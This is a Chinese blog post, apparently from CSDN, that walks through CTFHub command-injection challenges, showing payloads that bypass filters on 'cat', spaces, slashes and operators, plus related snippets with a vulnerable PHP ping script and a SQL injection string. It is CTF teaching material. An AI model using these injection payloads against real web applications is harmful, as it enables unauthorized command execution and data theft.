ctfhub——命令行注入

最新推荐文章于 2024-05-10 23:25:15 发布
最新推荐文章于 2024-05-10 23:25:15 发布
阅读量319 收藏 3
点赞数 6
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75007575/article/details/137404150
版权

一、过滤cat

看到源代码发现会将cat过滤到

那我们就可以通过空变量绕过

127.0.0.1;ca${x}t flag_168662771031779.php

打开控制台发现代码里面出现了flag,即通过成功

二、过滤空格

  1. 因为空格会被过滤掉,所以我们直接不写空格
  2. 127.0.0.1|ls后看到了flag文件

  1. 过滤掉了空格,我们使用${IFS}去绕过,IFS是shell的特殊环境变量,是linux下内部域分隔符。$IFS中储存的值可以是空格、制表符、换行符或其它自定义符号
  2. 并没有出现ping的结果输出,所以我们F12查看源码,发现flag,题目解决

三、过滤分隔符

这段代码首先检查是否存在名为ip的GET参数,并且该参数的值不为空。如果满足条件,将获取GET参数ip的值赋给变量$ip。接着,创建一个空数组$m,然后通过正则表达式preg_match_all("/\//", $ip, $m)来检查$ip中是否包含斜杠/。如果$ip中不包含斜杠,则会执行以下操作:

  1. 构建一个ping命令,用于向指定IP地址发送4个数据包。
  2. 使用exec()函数执行该命令,并将结果存储在数组$res中。

如果$ip中包含斜杠,则直接将匹配结果存储在数组$res中。

127.0.0.1;cat flag_is_here;ls/

127.0.0.1;cd flag_is_here;cat flag_5024734519662.php

既然不能使用目录分隔符,那我们就先进入目录再去查看文件

127.0.0.1;cd flag_is_here;cat flag_5024734519662.php

回显空白,得到flag

四、过滤运算符

运算符都被过滤掉了,我们也可以使用;。

;可以执行多条语句

127.0.0.1;cat flag_224813101720269.php

回显空白,得到flag

BYyyyy。
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
ctfquery:CTF数据查询命令行工具
05-19
查询CTF以获取特定信息。 用法 ctfquery [ -s SYM | -t TYPE_ID | -c TYPE_ID | -l LABEL | -v | -h ] -s SYM搜索名为SYM的符号 -S TYPE_ID搜索类型为TYPE_ID所有符号 -t TYPE_ID搜索以TYPE_ID标识的类型 -c TYPE...
CTFHUB web-rce-命令注入
2301_79783285的博客
12-17 1090
命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接并执行 ,因此我们可以使用常见的命令拼接字符对命令进行拼接,如使用“&”,“|”,“&&”,“||”等,linux系统下还可以使用“;”,“``”。Windows支持的管道符。
CTFHub | 命令注入
尼泊罗河伯的博客
06-14 1434
检查网页显示内容,可以直接看到源代码。大致意思是:检查用户输入的 GET 请求,判断用户是否输入了ip 信息。如果输入了 ip 信息,则使用用户输入的这个 ip 数据执行一个 shell 命令 "ping -c 4" 。
流量分析(一)
最新发布
Dug123456_的博客
05-10 856
常规操作,查找flag ctfhub{} 注意要选择字符集。
ctfhub-命令注入
m0_62094846的博客
12-15 323
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2001
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHUB-RCE-命令注入
u014794539的博客
07-10 1255
命令注入 无过滤 考点 属于是纯纯的命令注入 思路分析 构造playload 127.0.0.1|ls 发现一个数字串挺长的php 构造 127.0.0.1|cat 18930164348325.php 提交了[1]没有东西 可以构造 127.0.0.1|cat 18930164348325.php|base64 然后base64解码 或者不加base64 查看源码也能得到 playload: ctfhub{af6df24d6b085066d0dc46d3} 过滤cat 考点 过滤cat
CTFHub技能树web(持续更新)--RCE--命令注入
jiuyongpinyin的博客
01-26 194
命令注入 首先ping一下本机地址: 发现有回显,那就好办了,接下来查看当前目录的文件: 发现有一个很可疑的php文件,使用cat查看: 有回显,但是没有内容,尝试在url中访问也不行,最后想到了查看网页源代码: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
文件上传漏洞
jbabeltrace:用于读取 CTF 跟踪的命令行实用程序
07-12
`jbabeltrace` 是一个专门设计用于读取 CTF(Compact Trace Format)跟踪数据的命令行工具。CTF 是一种高效、轻量级的跟踪格式,常被用在系统性能分析、调试和诊断中。这个工具是用 Java 编写的,因此在跨平台性上...
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8464
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
CTFHub -技能树 命令注入-无过滤
qq_45653588的博客
07-24 2018
0X00 命令注入-无过滤 进入页面后给出的源码,题目要求输入IP地址执行ping命令 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <html> <head> <title>CTF
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 3709
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 892
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
命令注入————ctfhub(过滤cat、空格、目录分隔符、运算符、综合过滤练习)
qq_45655564的博客
05-30 8516
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFhub命令注入—过滤空格
manerzi的博客
10-25 645
CTFhub命令注入—过滤空格
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3240
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤了cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
ctfhub字符型注入
09-18
字符型注入是一种常见的Web漏洞,攻击者通过在输入框中插入恶意的字符来实现攻击。常见的字符型注入包括SQL注入、XPath注入、LDAP注入等。 对于CTF比赛中的字符型注入,一般可以通过输入一些特殊字符或者语句来实现注入。攻击者可以通过注入一些恶意的语句或者字符来获取敏感信息或者实现远程代码执行等操作。 例如,在一个搜索框中,输入以下语句: ``` ' or 1=1# ``` 这个语句的作用是在搜索条件中注入一个OR语句,并将搜索条件设置为1=1,这样就可以绕过认证,查看所有数据。其中#表示注释掉后面的语句,防止后续的语句被执行。 在实际的应用中,可以通过对输入进行过滤、转义等方式来防止字符型注入漏洞的产生。而对于攻击者来说,可以通过各种技巧来绕过这些防御措施,实现攻击。因此,对于Web开发人员来说,需要加强对Web安全的学习和了解,提高安全意识,才能更好地保护Web应用的安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值